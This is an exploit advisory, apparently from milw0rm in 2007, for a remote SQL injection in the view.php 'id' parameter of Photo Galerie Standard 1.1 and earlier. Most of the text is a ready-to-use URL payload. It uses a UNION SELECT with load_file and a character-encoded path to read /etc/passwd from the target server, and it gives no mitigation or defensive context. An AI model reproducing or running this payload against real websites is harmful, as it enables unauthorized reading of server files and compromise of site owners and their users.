*******************************************************************************
# Title : Photo Galerie Standard <= 1.1 (view.php) Remote SQL Injection Vulnerability
# Author : ajann
# Contact : :(
# S.Page : http://noname-media.com
# $$ : Free
*******************************************************************************
[[SQL]]]---------------------------------------------------------
http://[target]/[path]//view.php?id=[SQL]
Example:
etc/passwd Read
//view.php?id=-1%20union%20select%201,load_file(char((47,101,116,99,47,112,97,115,115,119,100)),3,4,0,0,0,0,0,0,0,0,0,0/*&categorie=8&next=1
[[/SQL]]
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2007-02-03]
